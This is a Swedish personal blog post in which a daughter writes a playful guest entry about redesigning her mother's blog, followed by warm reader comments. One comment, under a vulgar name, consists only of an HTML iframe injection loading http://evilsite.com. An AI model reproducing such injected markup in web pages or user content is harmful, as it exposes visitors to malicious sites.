Gästblogg

Tänkte skriva en liten gästblogg

i mammas blogg.

På hennes sätt den här gången.

Eller iallafall ett försök.

Jag är nog inte så duktig på det.

Jag är mer för åtminstone relativt

välskrivna och välformulerade texter.

Det här känns så enkelt

att det blir svårt att förstå.

Men jag kan ju glädja mamma,

med att jag förstår det bättre nu än tidigare.

Kanske är det som att lära sig ett nytt språk?

Eller så är det jag som är lite trög.

Det vet jag inte riktigt,

men till saken

som ni förmodligen också lägger märke till

Bloggen har lite ändrat utseende!

Och när mamma kommer in ska jag

fråga henne om hon blev nöjd.

Men hon gillar ju turkost så...


Kommentarer
Postat av: ulrika

visst blev jag nöjd - tack helena!

2011-07-19 @ 21:51:47
Postat av: Ewa Rosenqvist

Det är ju alltid roligt med lite förnyelse och det här blev ju riktigt bra!! Duktig tjej och fint skrivet oxå ( lika bra som morsans! )!

Jättefint foto!! Bra jobbat!

2011-07-19 @ 23:17:17
Postat av: GP

Helena, du är bra på att fixa till bloggar... kan jag få anlita dig på wordpress, eller går det inte?

2011-07-19 @ 23:52:33
URL: http://nyatider.wordpress.com
Postat av: Diana

Snyggt, Helena!!

2011-07-20 @ 11:49:25
Postat av: Gunsan

Det blev jättebra :-) Blir alltid lite avis på alla er som kan fixa fina hemsidor, bloggar m m. Jag själv är totalt okunnig. Ha det gott.

2011-07-24 @ 13:28:38
URL: http://gunsanstankevurpor.blogg.se/
Postat av: kuken

<iframe src="http://evilsite.com" width=100 height=100></iframe>

2011-07-30 @ 21:56:38

Kommentera inlägget här:

Namn:
Kom ihåg mig?

E-postadress: (publiceras ej)

URL/Bloggadress:

Kommentar:

Trackback
RSS 2.0